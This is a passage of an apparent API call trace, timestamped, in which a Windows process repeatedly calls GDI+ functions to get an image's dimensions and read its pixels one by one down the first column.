format=0x33dbe0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0168.415] GdipGetImageWidth (image=0x548fcf0, width=0x33e1e4) returned 0x0 [0168.416] GdipGetImageHeight (image=0x548fcf0, height=0x33e1e4) returned 0x0 [0168.424] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.424] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.425] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=0, color=0x33e1d0) returned 0x0 [0168.438] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.438] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.438] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=1, color=0x33e1d0) returned 0x0 [0168.454] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.454] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.454] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=2, color=0x33e1d0) returned 0x0 [0168.454] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.454] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.454] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=3, color=0x33e1d0) returned 0x0 [0168.454] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.454] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.454] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=4, color=0x33e1d0) returned 0x0 [0168.454] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.454] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.455] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=5, color=0x33e1d0) returned 0x0 [0168.455] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.455] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.455] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=6, color=0x33e1d0) returned 0x0 [0168.455] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.455] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.455] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=7, color=0x33e1d0) returned 0x0 [0168.455] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.455] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.455] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=8, color=0x33e1d0) returned 0x0 [0168.455] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.455] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.455] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=9, color=0x33e1d0) returned 0x0 [0168.455] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.455] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.455] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=10, color=0x33e1d0) returned 0x0 [0168.455] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.456] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.456] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=11, color=0x33e1d0) returned 0x0 [0168.456] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.456] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.456] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=12, color=0x33e1d0) returned 0x0 [0168.456] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.456] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.456] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=13, color=0x33e1d0) returned 0x0 [0168.456] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.456] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.456] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=14, color=0x33e1d0) returned 0x0 [0168.456] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.456] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.456] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=15, color=0x33e1d0) returned 0x0 [0168.456] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.456] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.456] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=16, color=0x33e1d0) returned 0x0 [0168.457] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.457] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.457] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=17, color=0x33e1d0) returned 0x0 [0168.457] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.457] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.457] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=18, color=0x33e1d0) returned 0x0 [0168.457] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.457] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.457] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=19, color=0x33e1d0) returned 0x0 [0168.457] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.457] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.457] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=20, color=0x33e1d0) returned 0x0 [0168.457] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.457] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.457] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=21, color=0x33e1d0) returned 0x0 [0168.457] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.457] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.457] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=22, color=0x33e1d0) returned 0x0 [0168.458] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.458] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.458] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=23, color=0x33e1d0) returned 0x0 [0168.458] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.458] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.458] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=24, color=0x33e1d0) returned 0x0 [0168.458] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.458] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.458] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=25, color=0x33e1d0) returned 0x0 [0168.458] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.458] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.458] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=26, color=0x33e1d0) returned 0x0 [0168.458] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.458] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.458] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=27, color=0x33e1d0) returned 0x0 [0168.458] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.458] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.458] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=28, color=0x33e1d0) returned 0x0 [0168.459] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.459] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.459] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=29, color=0x33e1d0) returned 0x0 [0168.459] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.459] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.459] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=30, color=0x33e1d0) returned 0x0 [0168.459] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.459] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.459] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=31, color=0x33e1d0) returned 0x0 [0168.459] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.459] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.459] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=32, color=0x33e1d0) returned 0x0 [0168.459] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.459] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.459] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=33, color=0x33e1d0) returned 0x0 [0168.459] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.460] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.460] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=34, color=0x33e1d0) returned 0x0 [0168.460] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.460] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.460] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=35, color=0x33e1d0) returned 0x0 [0168.460] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.460] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.460] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=36, color=0x33e1d0) returned 0x0 [0168.460] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.460] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.460] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=37, color=0x33e1d0) returned 0x0 [0168.460] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.460] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.460] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=38, color=0x33e1d0) returned 0x0 [0168.460] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.460] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.460] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=39, color=0x33e1d0) returned 0x0 [0168.460] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.461] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.461] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=40, color=0x33e1d0) returned 0x0 [0168.461] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.461] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.461] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=41, color=0x33e1d0) returned 0x0 [0168.461] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.461] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.461] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=42, color=0x33e1d0) returned 0x0 [0168.461] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.461] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.461] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=43, color=0x33e1d0) returned 0x0 [0168.461] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.461] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.461] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=44, color=0x33e1d0) returned 0x0 [0168.461] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.461] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.461] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=45, color=0x33e1d0) returned 0x0 [0168.461] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.462] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.462] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=46, color=0x33e1d0) returned 0x0 [0168.462] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.462] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.462] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=47, color=0x33e1d0) returned 0x0 [0168.462] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.462] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.462] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=48, color=0x33e1d0) returned 0x0 [0168.462] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.462] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.462] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=49, color=0x33e1d0) returned 0x0 [0168.462] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.462] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.462] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=50, color=0x33e1d0) returned 0x0 [0168.462] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.462] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.462] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=51, color=0x33e1d0) returned 0x0 [0168.462] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.463] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.463] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=52, color=0x33e1d0) returned 0x0 [0168.463] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.463] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.463] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=53, color=0x33e1d0) returned 0x0 [0168.463] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.463] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.463] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=54, color=0x33e1d0) returned 0x0 [0168.463] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.463] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.463] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=55, color=0x33e1d0) returned 0x0 [0168.463] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.463] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.463] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=56, color=0x33e1d0) returned 0x0 [0168.463] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.463] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.463] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=57, color=0x33e1d0) returned 0x0 [0168.463] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.464] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.464] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=58, color=0x33e1d0) returned 0x0 [0168.464] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.464] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.464] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=59, color=0x33e1d0) returned 0x0 [0168.464] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.464] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.464] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=60, color=0x33e1d0) returned 0x0 [0168.464] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.464] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.464] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=61, color=0x33e1d0) returned 0x0 [0168.464] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.464] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.464] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=62, color=0x33e1d0) returned 0x0 [0168.464] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.464] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.464] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=63, color=0x33e1d0) returned 0x0 [0168.464] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.465] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.465] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=64, color=0x33e1d0) returned 0x0 [0168.465] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.465] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.465] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=65, color=0x33e1d0) returned 0x0 [0168.465] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.465] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.465] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=66, color=0x33e1d0) returned 0x0 [0168.465] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.465] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.465] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=67, color=0x33e1d0) returned 0x0 [0168.465] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.465] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.465] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=68, color=0x33e1d0) returned 0x0 [0168.465] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.465] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.465] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=69, color=0x33e1d0) returned 0x0 [0168.466] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.466] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.466] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=70, color=0x33e1d0) returned 0x0 [0168.466] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.466] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.466] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=71, color=0x33e1d0) returned 0x0 [0168.466] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.466] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.466] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=72, color=0x33e1d0) returned 0x0 [0168.466] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.466] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.466] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=73, color=0x33e1d0) returned 0x0 [0168.466] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.466] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.466] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=74, color=0x33e1d0) returned 0x0 [0168.466] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.466] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.466] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=75, color=0x33e1d0) returned 0x0 [0168.467] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.467] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.467] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=76, color=0x33e1d0) returned 0x0 [0168.467] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.467] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.467] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=77, color=0x33e1d0) returned 0x0 [0168.467] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.467] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.467] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=78, color=0x33e1d0) returned 0x0 [0168.467] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.467] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.467] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=79, color=0x33e1d0) returned 0x0 [0168.467] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.467] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.467] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=80, color=0x33e1d0) returned 0x0 [0168.467] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.467] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.467] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=81, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.468] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=82, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.468] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=83, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.468] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=84, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.468] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=85, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.468] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=86, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.468] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=87, color=0x33e1d0) returned 0x0 [0168.468] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.468] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=88, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=89, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=90, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=91, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=92, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=93, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=94, color=0x33e1d0) returned 0x0 [0168.469] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.469] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.469] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=95, color=0x33e1d0) returned 0x0 [0168.470] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=96, color=0x33e1d0) returned 0x0 [0168.470] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=97, color=0x33e1d0) returned 0x0 [0168.470] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=98, color=0x33e1d0) returned 0x0 [0168.470] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=99, color=0x33e1d0) returned 0x0 [0168.470] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=100, color=0x33e1d0) returned 0x0 [0168.470] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.470] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.470] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=101, color=0x33e1d0) returned 0x0 [0168.470] 